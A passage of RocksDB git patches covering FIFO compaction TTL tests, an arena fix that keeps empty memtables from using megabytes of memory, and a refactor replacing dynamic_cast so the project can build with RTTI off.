files will be compacted to 1 // (due to level0_file_num_compaction_trigger = 6). // So total files = 1 + remaining 4 = 5. - ASSERT_OK(dbfull()->TEST_WaitForCompact()); ASSERT_EQ(NumTableFilesAtLevel(0), 5); - // Sleep for a little over ttl time. - env_->SleepForMicroseconds(6 * 1000 * 1000); + // Sleep for 2 hours -- which is much greater than TTL. + env_->addon_time_.fetch_add(2 * 60 * 60); + // Just to make sure that we are in the same state even after sleeping. ASSERT_OK(dbfull()->TEST_WaitForCompact()); ASSERT_EQ(NumTableFilesAtLevel(0), 5); @@ -2998,8 +3008,8 @@ TEST_F(DBTest, DISABLED_FIFOCompactionWithTTLTest) { ASSERT_OK(Put(ToString(i * 20 + j), RandomString(&rnd, 980))); } Flush(); + ASSERT_OK(dbfull()->TEST_WaitForCompact()); } - ASSERT_OK(dbfull()->TEST_WaitForCompact()); ASSERT_EQ(NumTableFilesAtLevel(0), 5); ASSERT_LE(SizeAtLevel(0), options.compaction_options_fifo.max_table_files_size); @@ -3011,7 +3021,7 @@ TEST_F(DBTest, DISABLED_FIFOCompactionWithTTLTest) { options.write_buffer_size = 20 << 10; // 20K options.compaction_options_fifo.max_table_files_size = 1500 << 10; // 1.5MB options.compaction_options_fifo.allow_compaction = true; - options.compaction_options_fifo.ttl = 60 * 60; // 1 hour + options.compaction_options_fifo.ttl = 1 * 60 * 60; // 1 hour options.level0_file_num_compaction_trigger = 6; options = CurrentOptions(options); DestroyAndReopen(options); @@ -3023,8 +3033,8 @@ TEST_F(DBTest, DISABLED_FIFOCompactionWithTTLTest) { ASSERT_OK(Put(ToString(i * 20 + j), RandomString(&rnd, 980))); } Flush(); + ASSERT_OK(dbfull()->TEST_WaitForCompact()); } - ASSERT_OK(dbfull()->TEST_WaitForCompact()); // It should be compacted to 10 files. ASSERT_EQ(NumTableFilesAtLevel(0), 10); @@ -3034,8 +3044,8 @@ TEST_F(DBTest, DISABLED_FIFOCompactionWithTTLTest) { ASSERT_OK(Put(ToString(i * 20 + j + 2000), RandomString(&rnd, 980))); } Flush(); + ASSERT_OK(dbfull()->TEST_WaitForCompact()); } - ASSERT_OK(dbfull()->TEST_WaitForCompact()); // It should be compacted to no more than 20 files. ASSERT_GT(NumTableFilesAtLevel(0), 10); From e85f2c64cb231150fead77846f4ec3bb22b1dd8a Mon Sep 17 00:00:00 2001 From: Mike Kolupaev Date: Fri, 28 Jul 2017 15:43:50 -0700 Subject: [PATCH 061/205] Prevent empty memtables from using a lot of memory Summary: This fixes OOMs that we (logdevice) are currently having in production. SkipListRep constructor does a couple small allocations from ConcurrentArena (see InlineSkipList constructor). ConcurrentArena would sometimes allocate an entire block for that, which is a few megabytes (we use Options::arena_block_size = 4 MB). So an empty memtable can take take 4 MB of memory. We have ~40k column families (spread across 15 DB instances), so 4 MB per empty memtable easily OOMs a machine for us. This PR makes ConcurrentArena always allocate from Arena's inline block when possible. So as long as InlineSkipList's initial allocations are below 2 KB there would be no blocks allocated for empty memtables. Closes https://github.com/facebook/rocksdb/pull/2569 Differential Revision: D5404029 Pulled By: al13n321 fbshipit-source-id: 568ec22a3fd1a485c06123f6b2dfc5e9ef67cd23 --- util/arena.h | 4 ++++ util/arena_test.cc | 6 ++++++ util/concurrent_arena.h | 15 +++++++++++++++ 3 files changed, 25 insertions(+) diff --git a/util/arena.h b/util/arena.h index a2093517162..af53a2ff81b 100644 --- a/util/arena.h +++ b/util/arena.h @@ -77,6 +77,10 @@ class Arena : public Allocator { size_t BlockSize() const override { return kBlockSize; } + bool IsInInlineBlock() const { + return blocks_.empty(); + } + private: char inline_block_[kInlineSize] __attribute__((__aligned__(sizeof(void*)))); // Number of bytes allocated in one block diff --git a/util/arena_test.cc b/util/arena_test.cc index a033765adcb..53777a20b6b 100644 --- a/util/arena_test.cc +++ b/util/arena_test.cc @@ -91,9 +91,13 @@ static void ApproximateMemoryUsageTest(size_t huge_page_size) { ASSERT_EQ(kZero, arena.ApproximateMemoryUsage()); // allocate inline bytes + EXPECT_TRUE(arena.IsInInlineBlock()); arena.AllocateAligned(8); + EXPECT_TRUE(arena.IsInInlineBlock()); arena.AllocateAligned(Arena::kInlineSize / 2 - 16); + EXPECT_TRUE(arena.IsInInlineBlock()); arena.AllocateAligned(Arena::kInlineSize / 2); + EXPECT_TRUE(arena.IsInInlineBlock()); ASSERT_EQ(arena.ApproximateMemoryUsage(), Arena::kInlineSize - 8); ASSERT_PRED2(CheckMemoryAllocated, arena.MemoryAllocatedBytes(), Arena::kInlineSize); @@ -102,6 +106,7 @@ static void ApproximateMemoryUsageTest(size_t huge_page_size) { // first allocation arena.AllocateAligned(kEntrySize); + EXPECT_FALSE(arena.IsInInlineBlock()); auto mem_usage = arena.MemoryAllocatedBytes(); if (huge_page_size) { ASSERT_TRUE( @@ -117,6 +122,7 @@ static void ApproximateMemoryUsageTest(size_t huge_page_size) { arena.AllocateAligned(kEntrySize); ASSERT_EQ(mem_usage, arena.MemoryAllocatedBytes()); ASSERT_EQ(arena.ApproximateMemoryUsage(), usage + kEntrySize); + EXPECT_FALSE(arena.IsInInlineBlock()); usage = arena.ApproximateMemoryUsage(); } if (huge_page_size) { diff --git a/util/concurrent_arena.h b/util/concurrent_arena.h index a79fb95fe2d..1ab88c7ff1a 100644 --- a/util/concurrent_arena.h +++ b/util/concurrent_arena.h @@ -164,6 +164,21 @@ class ConcurrentArena : public Allocator { // size, we adjust our request to avoid arena waste. auto exact = arena_allocated_and_unused_.load(std::memory_order_relaxed); assert(exact == arena_.AllocatedAndUnused()); + + if (exact >= bytes && arena_.IsInInlineBlock()) { + // If we haven't exhausted arena's inline block yet, allocate from arena + // directly. This ensures that we'll do the first few small allocations + // without allocating any blocks. + // In particular this prevents empty memtables from using + // disproportionately large amount of memory: a memtable allocates on + // the order of 1 KB of memory when created; we wouldn't want to + // allocate a full arena block (typically a few megabytes) for that, + // especially if there are thousands of empty memtables. + auto rv = func(); + Fixup(); + return rv; + } + avail = exact >= shard_block_size_ / 2 && exact < shard_block_size_ * 2 ? exact : shard_block_size_; From 21696ba502d7b2191d6e9c984536f3cc1fc452dd Mon Sep 17 00:00:00 2001 From: Siying Dong Date: Fri, 28 Jul 2017 16:23:50 -0700 Subject: [PATCH 062/205] Replace dynamic_cast<> Summary: Replace dynamic_cast<> so that users can choose to build with RTTI off, so that they can save several bytes per object, and get tiny more memory available. Some nontrivial changes: 1. Add Comparator::GetRootComparator() to get around the internal comparator hack 2. Add the two experiemental functions to DB 3. Add TableFactory::GetOptionString() to avoid unnecessary casting to get the option string 4. Since 3 is done, move the parsing option functions for table factory to table factory files too, to be symmetric. Closes https://github.com/facebook/rocksdb/pull/2645 Differential Revision: D5502723 Pulled By: siying fbshipit-source-id: fd13cec5601cf68a554d87bfcf056f2ffa5fbf7c --- HISTORY.md | 1 + Makefile | 12 + cache/clock_cache.cc | 5 + db/convenience.cc | 6 +- db/db_impl.h | 6 +- db/dbformat.h | 3 + db/experimental.cc | 12 +- db/wal_manager.cc | 5 +- env/mock_env.cc | 4 +- examples/Makefile | 4 + examples/compaction_filter_example.cc | 6 +- include/rocksdb/comparator.h | 4 + include/rocksdb/db.h | 11 + include/rocksdb/table.h | 6 + include/rocksdb/utilities/stackable_db.h | 11 + monitoring/histogram.cc | 4 +- monitoring/histogram_windowing.cc | 5 +- options/options_helper.cc | 315 +----------------- options/options_helper.h | 112 +------ options/options_parser.cc | 59 +--- options/options_parser.h | 10 +- options/options_test.cc | 24 +- table/block_based_table_factory.cc | 193 ++++++++++- table/block_based_table_factory.h | 94 +++++- table/cuckoo_table_factory.h | 5 + table/plain_table_factory.cc | 144 +++++++- table/plain_table_factory.h | 32 ++ tools/db_bench_tool.cc | 6 +- tools/ldb_cmd.cc | 7 +- tools/sst_dump_tool.cc | 12 +- util/cast_util.h | 19 ++ utilities/blob_db/blob_db_impl.cc | 28 +- utilities/column_aware_encoding_util.cc | 4 +- utilities/options/options_util_test.cc | 26 +- .../optimistic_transaction_impl.cc | 12 +- utilities/transactions/transaction_db_impl.cc | 11 +- utilities/transactions/transaction_impl.cc | 11 +- .../transactions/transaction_lock_mgr.cc | 6 +- 38 files changed, 684 insertions(+), 551 deletions(-) create mode 100644 util/cast_util.h diff --git a/HISTORY.md b/HISTORY.md index 9d8468c6e28..76e01f04c01 100644 --- a/HISTORY.md +++ b/HISTORY.md @@ -2,6 +2,7 @@ ## Unreleased ### New Features * Add Iterator::Refresh(), which allows users to update the iterator state so that they can avoid some initialization costs of recreating iterators. +* Replace dynamic_cast<> (except unit test) so people can choose to build with RTTI off. With make, release mode is by default built with -fno-rtti and debug mode is built without it. Users can override it by setting USE_RTTI=0 or 1. ## 5.7.0 (07/13/2017) ### Public API Change diff --git a/Makefile b/Makefile index 55f642135ed..a01c74e954e 100644 --- a/Makefile +++ b/Makefile @@ -101,7 +101,19 @@ endif ifeq ($(DEBUG_LEVEL),0) OPT += -DNDEBUG DISABLE_WARNING_AS_ERROR=1 + +ifneq ($(USE_RTTI), 1) + CXXFLAGS += -fno-rtti +else + CXXFLAGS += -DROCKSDB_USE_RTTI +endif else +ifneq ($(USE_RTTI), 0) + CXXFLAGS += -DROCKSDB_USE_RTTI +else + CXXFLAGS += -fno-rtti +endif + $(warning Warning: Compiling in debug mode. Don't use the resulting binary in production) endif diff --git a/cache/clock_cache.cc b/cache/clock_cache.cc index db9d1438e22..7e42714ef14 100644 --- a/cache/clock_cache.cc +++ b/cache/clock_cache.cc @@ -27,6 +27,11 @@ std::shared_ptr NewClockCache(size_t capacity, int num_shard_bits, #include #include +// "tbb/concurrent_hash_map.h" requires RTTI if exception is enabled. +// Disable it so users can chooose to disable RTTI. +#ifndef ROCKSDB_USE_RTTI +#define TBB_USE_EXCEPTIONS 0 +#endif #include "tbb/concurrent_hash_map.h" #include "cache/sharded_cache.h" diff --git a/db/convenience.cc b/db/convenience.cc index 6568b1ffff3..e3e7165b463 100644 --- a/db/convenience.cc +++ b/db/convenience.cc @@ -9,16 +9,18 @@ #include "rocksdb/convenience.h" #include "db/db_impl.h" +#include "util/cast_util.h" namespace rocksdb { void CancelAllBackgroundWork(DB* db, bool wait) { - (dynamic_cast(db->GetRootDB()))->CancelAllBackgroundWork(wait); + (static_cast_with_check(db->GetRootDB())) + ->CancelAllBackgroundWork(wait); } Status DeleteFilesInRange(DB* db, ColumnFamilyHandle* column_family, const Slice* begin, const Slice* end) { - return (dynamic_cast(db->GetRootDB())) + return (static_cast_with_check(db->GetRootDB())) ->DeleteFilesInRange(column_family, begin, end); } diff --git a/db/db_impl.h b/db/db_impl.h index 543d64ec800..7fec69cd732 100644 --- a/db/db_impl.h +++ b/db/db_impl.h @@ -235,11 +235,11 @@ class DBImpl : public DB { ColumnFamilyHandle* column_family, ColumnFamilyMetaData* metadata) override; - // experimental API Status SuggestCompactRange(ColumnFamilyHandle* column_family, - const Slice* begin, const Slice* end); + const Slice* begin, const Slice* end) override; - Status PromoteL0(ColumnFamilyHandle* column_family, int target_level); + Status PromoteL0(ColumnFamilyHandle* column_family, + int target_level) override; // Similar to Write() but will call the callback once on the single write // thread to determine whether it is safe to perform the write. diff --git a/db/dbformat.h b/db/dbformat.h index ed1861cf245..d9fd5f3997b 100644 --- a/db/dbformat.h +++ b/db/dbformat.h @@ -157,6 +157,9 @@ class InternalKeyComparator : public Comparator { int Compare(const InternalKey& a, const InternalKey& b) const; int Compare(const ParsedInternalKey& a, const ParsedInternalKey& b) const; + virtual const Comparator* GetRootComparator() const override { + return user_comparator_->GetRootComparator(); + } }; // Modules in this directory should keep internal keys wrapped inside diff --git a/db/experimental.cc b/db/experimental.cc index 45d4d70aa82..effe9d7c355 100644 --- a/db/experimental.cc +++ b/db/experimental.cc @@ -14,20 +14,18 @@ namespace experimental { Status SuggestCompactRange(DB* db, ColumnFamilyHandle* column_family, const Slice* begin, const Slice* end) { - auto dbimpl = dynamic_cast(db); - if (dbimpl == nullptr) { - return Status::InvalidArgument("Didn't recognize DB object"); + if (db == nullptr) { + return Status::InvalidArgument("DB is empty"); } - return dbimpl->SuggestCompactRange(column_family, begin, end); + return db->SuggestCompactRange(column_family, begin, end); } Status PromoteL0(DB* db, ColumnFamilyHandle* column_family, int target_level) { - auto dbimpl = dynamic_cast(db); - if (dbimpl == nullptr) { + if (db == nullptr) { return Status::InvalidArgument("Didn't recognize DB object"); } - return dbimpl->PromoteL0(column_family, target_level); + return db->PromoteL0(column_family, target_level); } #else // ROCKSDB_LITE diff --git a/db/wal_manager.cc b/db/wal_manager.cc index 7ee2dd0176e..4a9ecbfdd8e 100644 --- a/db/wal_manager.cc +++ b/db/wal_manager.cc @@ -26,6 +26,7 @@ #include "rocksdb/env.h" #include "rocksdb/options.h" #include "rocksdb/write_batch.h" +#include "util/cast_util.h" #include "util/coding.h" #include "util/file_reader_writer.h" #include "util/filename.h" @@ -273,8 +274,8 @@ namespace { struct CompareLogByPointer { bool operator()(const std::unique_ptr& a, const std::unique_ptr& b) { - LogFileImpl* a_impl = dynamic_cast(a.get()); - LogFileImpl* b_impl = dynamic_cast(b.get()); + LogFileImpl* a_impl = static_cast_with_check(a.get()); + LogFileImpl* b_impl = static_cast_with_check(b.get()); return *a_impl < *b_impl; } }; diff --git a/env/mock_env.cc b/env/mock_env.cc index 79a4f8c44a6..669011c4ee4 100644 --- a/env/mock_env.cc +++ b/env/mock_env.cc @@ -11,6 +11,7 @@ #include #include #include "port/sys_time.h" +#include "util/cast_util.h" #include "util/murmurhash.h" #include "util/random.h" #include "util/rate_limiter.h" @@ -711,7 +712,8 @@ Status MockEnv::LockFile(const std::string& fname, FileLock** flock) { } Status MockEnv::UnlockFile(FileLock* flock) { - std::string fn = dynamic_cast(flock)->FileName(); + std::string fn = + static_cast_with_check(flock)->FileName(); { MutexLock lock(&mutex_); if (file_map_.find(fn) != file_map_.end()) { diff --git a/examples/Makefile b/examples/Makefile index a3a786e8315..57cd1a75a1c 100644 --- a/examples/Makefile +++ b/examples/Makefile @@ -8,6 +8,10 @@ ifndef DISABLE_JEMALLOC PLATFORM_CXXFLAGS += $(JEMALLOC_INCLUDE) endif +ifneq ($(USE_RTTI), 1) + CXXFLAGS += -fno-rtti +endif + .PHONY: clean librocksdb all: simple_example column_families_example compact_files_example c_simple_example optimistic_transaction_example transaction_example compaction_filter_example options_file_example diff --git a/examples/compaction_filter_example.cc b/examples/compaction_filter_example.cc index 7a78244a0c6..226dfe7905d 100644 --- a/examples/compaction_filter_example.cc +++ b/examples/compaction_filter_example.cc @@ -59,7 +59,11 @@ int main() { MyFilter filter; - system("rm -rf /tmp/rocksmergetest"); + int ret = system("rm -rf /tmp/rocksmergetest"); + if (ret != 0) { + fprintf(stderr, "Error deleting /tmp/rocksmergetest, code: %d\n", ret); + return ret; + } rocksdb::Options options; options.create_if_missing = true; options.merge_operator.reset(new MyMerge); diff --git a/include/rocksdb/comparator.h b/include/rocksdb/comparator.h index ac6e4a9b096..64db73a7244 100644 --- a/include/rocksdb/comparator.h +++ b/include/rocksdb/comparator.h @@ -64,6 +64,10 @@ class Comparator { // Simple comparator implementations may return with *key unchanged, // i.e., an implementation of this method that does nothing is correct. virtual void FindShortSuccessor(std::string* key) const = 0; + + // if it is a wrapped comparator, may return the root one. + // return itself it is not wrapped. + virtual const Comparator* GetRootComparator() const { return this; } }; // Return a builtin comparator that uses lexicographic byte-wise diff --git a/include/rocksdb/db.h b/include/rocksdb/db.h index ee5706b4c8b..692932c35de 100644 --- a/include/rocksdb/db.h +++ b/include/rocksdb/db.h @@ -1097,6 +1097,17 @@ class DB { virtual Status GetPropertiesOfTablesInRange( ColumnFamilyHandle* column_family, const Range* range, std::size_t n, TablePropertiesCollection* props) = 0; + + virtual Status SuggestCompactRange(ColumnFamilyHandle* column_family, + const Slice* begin, const Slice* end) { + return Status::NotSupported("SuggestCompactRange() is not implemented."); + } + + virtual Status PromoteL0(ColumnFamilyHandle* column_family, + int target_level) { + return Status::NotSupported("PromoteL0() is not implemented."); + } + #endif // ROCKSDB_LITE // Needed for StackableDB diff --git a/include/rocksdb/table.h b/include/rocksdb/table.h index 40e4d88b6c9..04e532e161c 100644 --- a/include/rocksdb/table.h +++ b/include/rocksdb/table.h @@ -467,6 +467,12 @@ class TableFactory { // RocksDB prints configurations at DB Open(). virtual std::string GetPrintableTableOptions() const = 0; + virtual Status GetOptionString(std::string* opt_string, + const std::string& delimiter) const { + return Status::NotSupported( + "The table factory doesn't implement GetOptionString()."); + } + // Returns the raw pointer of the table options that is used by this // TableFactory, or nullptr if this function is not supported. // Since the return value is a raw pointer, the TableFactory owns the diff --git a/include/rocksdb/utilities/stackable_db.h b/include/rocksdb/utilities/stackable_db.h index db5068b1d57..d2c0dbd7b7d 100644 --- a/include/rocksdb/utilities/stackable_db.h +++ b/include/rocksdb/utilities/stackable_db.h @@ -350,6 +350,17 @@ class StackableDB : public DB { return db_->GetUpdatesSince(seq_number, iter, read_options); } + virtual Status SuggestCompactRange(ColumnFamilyHandle* column_family, + const Slice* begin, + const Slice* end) override { + return db_->SuggestCompactRange(column_family, begin, end); + } + + virtual Status PromoteL0(ColumnFamilyHandle* column_family, + int target_level) override { + return db_->PromoteL0(column_family, target_level); + } + virtual ColumnFamilyHandle* DefaultColumnFamily() const override { return db_->DefaultColumnFamily(); } diff --git a/monitoring/histogram.cc b/monitoring/histogram.cc index 835ffc88a70..56b5a3914a1 100644 --- a/monitoring/histogram.cc +++ b/monitoring/histogram.cc @@ -19,6 +19,7 @@ #include #include "port/port.h" +#include "util/cast_util.h" namespace rocksdb { @@ -255,7 +256,8 @@ void HistogramImpl::Add(uint64_t value) { void HistogramImpl::Merge(const Histogram& other) { if (strcmp(Name(), other.Name()) == 0) { - Merge(dynamic_cast(other)); + Merge( + *static_cast_with_check(&other)); } } diff --git a/monitoring/histogram_windowing.cc b/monitoring/histogram_windowing.cc index 20ee983f145..28d8265f263 100644 --- a/monitoring/histogram_windowing.cc +++ b/monitoring/histogram_windowing.cc @@ -9,6 +9,7 @@ #include "monitoring/histogram_windowing.h" #include "monitoring/histogram.h" +#include "util/cast_util.h" #include @@ -64,7 +65,9 @@ void HistogramWindowingImpl::Add(uint64_t value){ void HistogramWindowingImpl::Merge(const Histogram& other) { if (strcmp(Name(), other.Name()) == 0) { - Merge(dynamic_cast(other)); + Merge( + *static_cast_with_check( + &other)); } } diff --git a/options/options_helper.cc b/options/options_helper.cc index 9e984f6e39e..5cf548fb9e2 100644 --- a/options/options_helper.cc +++ b/options/options_helper.cc @@ -21,6 +21,7 @@ #include "rocksdb/table.h" #include "table/block_based_table_factory.h" #include "table/plain_table_factory.h" +#include "util/cast_util.h" #include "util/string_util.h" namespace rocksdb { @@ -303,6 +304,7 @@ bool ParseSliceTransform( // SliceTransforms here. return false; } +} // anonymouse namespace bool ParseOptionHelper(char* opt_address, const OptionType& opt_type, const std::string& value) { @@ -383,8 +385,6 @@ bool ParseOptionHelper(char* opt_address, const OptionType& opt_type, return true; } -} // anonymouse namespace - bool SerializeSingleOptionHelper(const char* opt_address, const OptionType opt_type, std::string* value) { @@ -466,12 +466,14 @@ bool SerializeSingleOptionHelper(const char* opt_address, // Since the user-specified comparator will be wrapped by // InternalKeyComparator, we should persist the user-specified one // instead of InternalKeyComparator. - const auto* internal_comparator = - dynamic_cast(*ptr); - if (internal_comparator != nullptr) { - *value = internal_comparator->user_comparator()->Name(); + if (*ptr == nullptr) { + *value = kNullptrString; } else { - *value = *ptr ? (*ptr)->Name() : kNullptrString; + const Comparator* root_comp = (*ptr)->GetRootComparator(); + if (root_comp == nullptr) { + root_comp = (*ptr); + } + *value = root_comp->Name(); } break; } @@ -693,8 +695,9 @@ Status ParseColumnFamilyOption(const std::string& name, if (name == "block_based_table_factory") { // Nested options BlockBasedTableOptions table_opt, base_table_options; - auto block_based_table_factory = dynamic_cast( - new_options->table_factory.get()); + BlockBasedTableFactory* block_based_table_factory = + static_cast_with_check( + new_options->table_factory.get()); if (block_based_table_factory != nullptr) { base_table_options = block_based_table_factory->table_options(); } @@ -708,8 +711,9 @@ Status ParseColumnFamilyOption(const std::string& name, } else if (name == "plain_table_factory") { // Nested options PlainTableOptions table_opt, base_table_options; - auto plain_table_factory = dynamic_cast( - new_options->table_factory.get()); + PlainTableFactory* plain_table_factory = + static_cast_with_check( + new_options->table_factory.get()); if (plain_table_factory != nullptr) { base_table_options = plain_table_factory->table_options(); } @@ -909,59 +913,6 @@ std::vector GetSupportedCompressions() { return supported_compressions; } -bool SerializeSingleBlockBasedTableOption( - std::string* opt_string, const BlockBasedTableOptions& bbt_options, - const std::string& name, const std::string& delimiter) { - auto iter = block_based_table_type_info.find(name); - if (iter == block_based_table_type_info.end()) { - return false; - } - auto& opt_info = iter->second; - const char* opt_address = - reinterpret_cast(&bbt_options) + opt_info.offset; - std::string value; - bool result = SerializeSingleOptionHelper(opt_address, opt_info.type, &value); - if (result) { - *opt_string = name + "=" + value + delimiter; - } - return result; -} - -Status GetStringFromBlockBasedTableOptions( - std::string* opt_string, const BlockBasedTableOptions& bbt_options, - const std::string& delimiter) { - assert(opt_string); - opt_string->clear(); - for (auto iter = block_based_table_type_info.begin(); - iter != block_based_table_type_info.end(); ++iter) { - if (iter->second.verification == OptionVerificationType::kDeprecated) { - // If the option is no longer used in rocksdb and marked as deprecated, - // we skip it in the serialization. - continue; - } - std::string single_output; - bool result = SerializeSingleBlockBasedTableOption( - &single_output, bbt_options, iter->first, delimiter); - assert(result); - if (result) { - opt_string->append(single_output); - } - } - return Status::OK(); -} - -Status GetStringFromTableFactory(std::string* opts_str, const TableFactory* tf, - const std::string& delimiter) { - const auto* bbtf = dynamic_cast(tf); - opts_str->clear(); - if (bbtf != nullptr) { - return GetStringFromBlockBasedTableOptions(opts_str, bbtf->table_options(), - delimiter); - } - - return Status::OK(); -} - Status ParseDBOption(const std::string& name, const std::string& org_value, DBOptions* new_options, @@ -1003,242 +954,6 @@ Status ParseDBOption(const std::string& name, return Status::OK(); } -std::string ParseBlockBasedTableOption(const std::string& name, - const std::string& org_value, - BlockBasedTableOptions* new_options, - bool input_strings_escaped = false, - bool ignore_unknown_options = false) { - const std::string& value = - input_strings_escaped ? UnescapeOptionString(org_value) : org_value; - if (!input_strings_escaped) { - // if the input string is not escaped, it means this function is - // invoked from SetOptions, which takes the old format. - if (name == "block_cache") { - new_options->block_cache = NewLRUCache(ParseSizeT(value)); - return ""; - } else if (name == "block_cache_compressed") { - new_options->block_cache_compressed = NewLRUCache(ParseSizeT(value)); - return ""; - } else if (name == "filter_policy") { - // Expect the following format - // bloomfilter:int:bool - const std::string kName = "bloomfilter:"; - if (value.compare(0, kName.size(), kName) != 0) { - return "Invalid filter policy name"; - } - size_t pos = value.find(':', kName.size()); - if (pos == std::string::npos) { - return "Invalid filter policy config, missing bits_per_key"; - } - int bits_per_key = - ParseInt(trim(value.substr(kName.size(), pos - kName.size()))); - bool use_block_based_builder = - ParseBoolean("use_block_based_builder", trim(value.substr(pos + 1))); - new_options->filter_policy.reset( - NewBloomFilterPolicy(bits_per_key, use_block_based_builder)); - return ""; - } - } - const auto iter = block_based_table_type_info.find(name); - if (iter == block_based_table_type_info.end()) { - if (ignore_unknown_options) { - return ""; - } else { - return "Unrecognized option"; - } - } - const auto& opt_info = iter->second; - if (opt_info.verification != OptionVerificationType::kDeprecated && - !ParseOptionHelper(reinterpret_cast(new_options) + opt_info.offset, - opt_info.type, value)) { - return "Invalid value"; - } - return ""; -} - -std::string ParsePlainTableOptions(const std::string& name, - const std::string& org_value, - PlainTableOptions* new_options, - bool input_strings_escaped = false, - bool ignore_unknown_options = false) { - const std::string& value = - input_strings_escaped ? UnescapeOptionString(org_value) : org_value; - const auto iter = plain_table_type_info.find(name); - if (iter == plain_table_type_info.end()) { - if (ignore_unknown_options) { - return ""; - } else { - return "Unrecognized option"; - } - } - const auto& opt_info = iter->second; - if (opt_info.verification != OptionVerificationType::kDeprecated && - !ParseOptionHelper(reinterpret_cast(new_options) + opt_info.offset, - opt_info.type, value)) { - return "Invalid value"; - } - return ""; -} - -Status GetBlockBasedTableOptionsFromMap( - const BlockBasedTableOptions& table_options, - const std::unordered_map& opts_map, - BlockBasedTableOptions* new_table_options, bool input_strings_escaped, - bool ignore_unknown_options) { - assert(new_table_options); - *new_table_options = table_options; - for (const auto& o : opts_map) { - auto error_message = ParseBlockBasedTableOption( - o.first, o.second, new_table_options, input_strings_escaped, - ignore_unknown_options); - if (error_message != "") { - const auto iter = block_based_table_type_info.find(o.first); - if (iter == block_based_table_type_info.end() || - !input_strings_escaped || // !input_strings_escaped indicates - // the old API, where everything is - // parsable. - (iter->second.verification != OptionVerificationType::kByName && - iter->second.verification != - OptionVerificationType::kByNameAllowNull && - iter->second.verification != - OptionVerificationType::kDeprecated)) { - // Restore "new_options" to the default "base_options". - *new_table_options = table_options; - return Status::InvalidArgument("Can't parse BlockBasedTableOptions:", - o.first + " " + error_message); - } - } - } - return Status::OK(); -} - -Status GetBlockBasedTableOptionsFromString( - const BlockBasedTableOptions& table_options, - const std::string& opts_str, - BlockBasedTableOptions* new_table_options) { - std::unordered_map opts_map; - Status s = StringToMap(opts_str, &opts_map); - if (!s.ok()) { - return s; - } - return GetBlockBasedTableOptionsFromMap(table_options, opts_map, - new_table_options); -} - -Status GetPlainTableOptionsFromMap( - const PlainTableOptions& table_options, - const std::unordered_map& opts_map, - PlainTableOptions* new_table_options, bool input_strings_escaped, - bool ignore_unknown_options) { - assert(new_table_options); - *new_table_options = table_options; - for (const auto& o : opts_map) { - auto error_message = ParsePlainTableOptions( - o.first, o.second, new_table_options, input_strings_escaped); - if (error_message != "") { - const auto iter = plain_table_type_info.find(o.first); - if (iter == plain_table_type_info.end() || - !input_strings_escaped || // !input_strings_escaped indicates - // the old API, where everything is - // parsable. - (iter->second.verification != OptionVerificationType::kByName && - iter->second.verification != - OptionVerificationType::kByNameAllowNull && - iter->second.verification != - OptionVerificationType::kDeprecated)) { - // Restore "new_options" to the default "base_options". - *new_table_options = table_options; - return Status::InvalidArgument("Can't parse PlainTableOptions:", - o.first + " " + error_message); - } - } - } - return Status::OK(); -} - -Status GetPlainTableOptionsFromString( - const PlainTableOptions& table_options, - const std::string& opts_str, - PlainTableOptions* new_table_options) { - std::unordered_map opts_map; - Status s = StringToMap(opts_str, &opts_map); - if (!s.ok()) { - return s; - } - return GetPlainTableOptionsFromMap(table_options, opts_map, - new_table_options); -} - -Status GetMemTableRepFactoryFromString(const std::string& opts_str, - std::unique_ptr* new_mem_factory) { - std::vector opts_list = StringSplit(opts_str, ':'); - size_t len = opts_list.size(); - - if (opts_list.size() <= 0 || opts_list.size() > 2) { - return Status::InvalidArgument("Can't parse memtable_factory option ", - opts_str); - } - - MemTableRepFactory* mem_factory = nullptr; - - if (opts_list[0] == "skip_list") { - // Expecting format - // skip_list: - if (2 == len) { - size_t lookahead = ParseSizeT(opts_list[1]); - mem_factory = new SkipListFactory(lookahead); - } else if (1 == len) { - mem_factory = new SkipListFactory(); - } - } else if (opts_list[0] == "prefix_hash") { - // Expecting format - // prfix_hash: - if (2 == len) { - size_t hash_bucket_count = ParseSizeT(opts_list[1]); - mem_factory = NewHashSkipListRepFactory(hash_bucket_count); - } else if (1 == len) { - mem_factory = NewHashSkipListRepFactory(); - } - } else if (opts_list[0] == "hash_linkedlist") { - // Expecting format - // hash_linkedlist: - if (2 == len) { - size_t hash_bucket_count = ParseSizeT(opts_list[1]); - mem_factory = NewHashLinkListRepFactory(hash_bucket_count); - } else if (1 == len) { - mem_factory = NewHashLinkListRepFactory(); - } - } else if (opts_list[0] == "vector") { - // Expecting format - // vector: - if (2 == len) { - size_t count = ParseSizeT(opts_list[1]); - mem_factory = new VectorRepFactory(count); - } else if (1 == len) { - mem_factory = new VectorRepFactory(); - } - } else if (opts_list[0] == "cuckoo") { - // Expecting format - // cuckoo: - if (2 == len) { - size_t write_buffer_size = ParseSizeT(opts_list[1]); - mem_factory= NewHashCuckooRepFactory(write_buffer_size); - } else if (1 == len) { - return Status::InvalidArgument("Can't parse memtable_factory option ", - opts_str); - } - } else { - return Status::InvalidArgument("Unrecognized memtable_factory option ", - opts_str); - } - - if (mem_factory != nullptr){ - new_mem_factory->reset(mem_factory); - } - - return Status::OK(); -} - Status GetColumnFamilyOptionsFromMap( const ColumnFamilyOptions& base_options, const std::unordered_map& opts_map, diff --git a/options/options_helper.h b/options/options_helper.h index b15faa74f75..95861203917 100644 --- a/options/options_helper.h +++ b/options/options_helper.h @@ -60,9 +60,6 @@ Status GetTableFactoryFromMap( std::shared_ptr* table_factory, bool ignore_unknown_options = false); -Status GetStringFromTableFactory(std::string* opts_str, const TableFactory* tf, - const std::string& delimiter = "; "); - enum class OptionType { kBoolean, kInt, @@ -580,109 +577,6 @@ static std::unordered_map cf_options_type_info = { {offset_of(&ColumnFamilyOptions::compaction_pri), OptionType::kCompactionPri, OptionVerificationType::kNormal, false, 0}}}; -static std::unordered_map - block_based_table_type_info = { - /* currently not supported - std::shared_ptr block_cache = nullptr; - std::shared_ptr block_cache_compressed = nullptr; - */ - {"flush_block_policy_factory", - {offsetof(struct BlockBasedTableOptions, flush_block_policy_factory), - OptionType::kFlushBlockPolicyFactory, OptionVerificationType::kByName, - false, 0}}, - {"cache_index_and_filter_blocks", - {offsetof(struct BlockBasedTableOptions, - cache_index_and_filter_blocks), - OptionType::kBoolean, OptionVerificationType::kNormal, false, 0}}, - {"cache_index_and_filter_blocks_with_high_priority", - {offsetof(struct BlockBasedTableOptions, - cache_index_and_filter_blocks_with_high_priority), - OptionType::kBoolean, OptionVerificationType::kNormal, false, 0}}, - {"pin_l0_filter_and_index_blocks_in_cache", - {offsetof(struct BlockBasedTableOptions, - 